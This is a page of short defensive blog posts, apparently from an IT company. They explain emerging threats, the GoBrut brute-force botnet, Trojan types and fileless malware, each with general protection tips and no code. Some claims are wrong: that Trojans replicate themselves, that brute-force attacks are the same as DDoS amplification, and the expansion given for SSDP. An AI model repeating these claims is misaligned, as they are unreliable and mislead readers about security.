Posts Tagged Cyber Attack

Emerging Cyber Security Threats

2020 has witnessed a great change in the work environment of organizations with an increase in number of remote and work from home employees. This change in dynamics has paved way for new cyber security threats along with re-emergence of some old threats.

Here is a list of emerging cyber security threats that organizations should be aware of in order to stay protected:

  • Work-From-Home Attacks: Cyber security attacks on work-from-home or remote employees are not new but the frequency and extent of such attacks has increased many folds with the new work culture. Cyber criminals are targeting multiple and insecure home networks at same time to launch wide spread breach of critical systems and services. AN effective way to solve this problem is to effectively use Identity & Access Management Tools that are capable of analyzing user activity, resource requests, and corporate connectivity behavior.
  • Brute Force Attacks: Brute force attacks have resurfaced as cyber criminals are recognizing the potential of DDOS attacks. Hackers are making use of simple services delivery protocol (SSDP) and simple network management protocol (SNMP) to launch large number of Distributed Denial Of Service attacks. Use of botnet swarms has enable hackers to amplify IP requests to overwhelm organizational networks leading to slower response time. SNMP attacks can cause more damage as the protocol connects and manages common corporate devices, such as modems, printers, routers and servers. Compromised SNMP help attackers in bypassing firewalls which exposes all corporate services to risk.
  • Fileless Frameworks: Fileless malware and ransomware attacks are designed to bypass common detection controls and infiltrating key systems by using legitimate platforms or software tools that already exist within corporate networks. This allows hackers to get past common detection methods that scan for malicious files. Use of existing system tools does away with the need for cyber criminals to design an attack framework which decreases the time required for malware development.
  • Front Line Phishing: One of the biggest news of 2021 is COVID-19 vaccine. People are extensively searching online to know more information about the vaccine such as current state of the disease, when will the vaccine be given out, who has been approved to get the vaccine, etc. Thus, organizations and individuals should be prepared for phishing attacks fabricated around this topic. Cyber criminals are using COVID-19 vaccine information links as phishing baits in their emails or messages to lure users.

For more information on cyber security threats, contact Centex Technologies at (254) 213 – 4740.

, , ,

No Comments

What Is Whaling Attack?

PDF Version: What-Is-Whaling-Attack

, , , ,

No Comments

Understanding Everything About GoBrut

GoBrut is a computer virus written in Go programming language. The compilation of GoLang programs generates binaries that have all required dependencies embedded in them. It avoids the need of installed runtimes within the machine and simplifies the multi-platform support of Go applications.

Mode Of Infection

GoBrut virus infects Windows and Linux machines using ‘Brute Force’ method.

What Is Brute Force Infection?

A brute force attack is also known as brute force cracking. It involves a computer machine that tries different combinations of usernames and passwords until it finds the correct combination to unlock the victim machine or network.

There are different types of brute force attacks that can be used by GoBrut virus. Some common types are:

  • Dictionary Attack: The attacker uses a dictionary of possible passwords to guess the right password.
  • Exhaustive Key Search: The computer tries every possible combination of characters to find the correct password. The new computers can brute force crack an 8 character alphanumeric password (including capitals, lowercase letters, numbers, and special characters) in about two hours.
  • Credential Recycling: In this type of attack, the attackers use the leaked usernames and passwords from other data breaches.

The virus is mainly used to target servers running Content Management Systems (CMS) and technologies such as SSH and MySQL. Here is a list of commonly targeted platforms:

Content Management Systems

  • Bitrix
  • Drupal
  • Joomla
  • Magento
  • WordPress
  • OpenCart

Databases

  • MySQL
  • Postgres

Administration Tools

  • SSH
  • FTP
  • cPanel
  • PhpMyAdmin
  • Webhostmanagement

After-Infection Process:

  • After successful infection, the infected system becomes a part of the GoBrut botnet. It now requests work from Command and Control server of the botnet.
  • Once the work is received, the infected host will now bruteforce other systems on the network (mentioned in the work request sent by botnet owner).
  • This allows lateral spread of GoBrut virus in the network.
  • After gaining access to a machine’s credentials, the attackers may steal confidential information, photos or other private data.

As the virus uses brute force techniques to steal password, the machines using low-security passwords are at higher risk of infection. Thus, simple ways to protect a system or network from GoBrut virus are:

  • Use of strong and reliable passwords.
  • Regular update of passwords after short intervals.
  • Avoid use of common passwords for different systems.
  • Apply access control for remote logins across all services.
  • Update all services and plugins regularly to combat vulnerabilities.

For more information on the GoBrut virus, contact Centex Technologies at (254) 213 – 4740.

, , , , ,

No Comments

What Is A Trojan And How To Protect Against It?

A Trojan Virus or Trojan Horse virus is a type of malware that impersonates legitimate files or programs for conceding its true contents. The payload hidden in the Trojan Virus remains unknown to the target user and can act as delivery vehicle for a variety of threats. Unlike normal viruses, a Trojan virus is capable of replicating itself.

Types Of Trojan Virus

Common types of Trojan Virus are:

  • Backdoor Trojans – This type of Trojan Virus allows hackers to remotely access and control a computer for uploading, downloading, or executing files.
  • Exploit Trojans –These Trojans inject a machine with code that is specifically designed to take advantage of vulnerability inherent to a specific piece of software.
  • Rootkit Trojans –These Trojans prevent the discovery of malware already infecting a system so that it can cause maximum damage.
  • Banker Trojans –This type of Trojan Virus specifically targets personal information used for banking and other online transactions.
  • Distributed Denial of Service (DDoS) Trojans – These Trojans are programmed to execute DDoS attacks, where a network or machine is disabled by a flood of requests originating from different sources.
  • Downloader Trojans –These are files written to download additional malware, often including more Trojans, onto an infected system.

Detecting A Trojan Virus:

Some common telltale signs of infection by a Trojan Virus are:

  • Poor Device Performance
  • Strange Device Behavior
  • Pop-Up & Spam Interruptions

If the system exhibits any of these behaviors, it is possible that system is infected with a Trojan Virus. Here are some ways to detect the Trojan:

  • Search the system for programs or applications you don’t remember installing.
  • If you find any unrecognized file names, search online for these file names to check if they are recognized Trojans
  • Scan the system with antivirus and antimalware software to see if it detects a malicious file.

Defending Against Trojan Virus

As preventive measures, stick to following practices to defend your system against Trojan Virus:

  • Install an effective internet security solution
  • Refrain from downloading or installing software from a source you don’t trust
  • Never open an attachment or run a program sent in an email from an unrecognized address
  • Keep all software on your computer up to date with the latest patches for avoiding vulnerabilities
  • Make sure a Trojan antivirus is installed and running on your system
  • Run regular system scans

For more information on Trojan Virus, contact Centex Technologies at (254) 213 – 4740.

, , , ,

No Comments

How Does Fileless Malware Work?

Fileless malware is defined as a type of malicious software that does not rely on virus-laden files to infect a host or victim. In contrast, it makes use of applications that are commonly used to perform legitimate and justified activity for executing malicious code in resident memory of the host. As the software doesn’t create any files, it doesn’t leave any footprints making it difficult to detect and remove.

Key Targets Of Fileless Malware:

The attackers who employ fileless malware tend to gather large amount of information in short span of time. So, they tend to focus the attack on a few key targets. Two systems that form common target are:

  • PowerShell
  • Windows Management Instrumentations

The reasons why attackers choose these systems are:

  • Security technologies trust these utilities
  • Analysts tend to assume that actions of these systems are legitimate
  • These utilities provide complete control over an endpoint
  • Most organizations refrain from shutting down these systems as it will hinder business It or DevOps work

Working Of Fileless Malware:

Following are few scenarios in which fileless malware can use a system’s software, applications and protocols to install and execute malicious activity:

  • Phishing emails, malicious downloads, and links that look legitimate are used as points of entry. Once a user clicks on these links, they load to system’s memory. This enables the hackers to remotely load codes to steal confidential data.
  • Malicious code can be injected into applications that are already installed on the system and trusted by the user. After injecting the code, these applications are hijacked and executed by hackers to carry out malicious activity.
  • Attackers create fake websites that mimic legitimate business pages. When user visits these pages, the websites search for vulnerabilities in Flash plugin. These vulnerabilities are exploited to run malicious code in the browser memory.

Fileless malware is written directly to RAM of the infected system and no changes are made on the hard disk. The malware works in memory and the operations end when the system reboots.

Defending Against Fileless Malware Attacks:

The effective way to defend against fileless malware attacks is to adopt an integrated approach that addresses the entire threat lifecycle. Employing a multi-layer defense protocol enables the user to investigate every phase before, during and after the attack.

For more information on fileless malware and tips on preventing cyber-attacks on computer networks, contact Centex Technologies at (254) 213 – 4740.

, , , ,

No Comments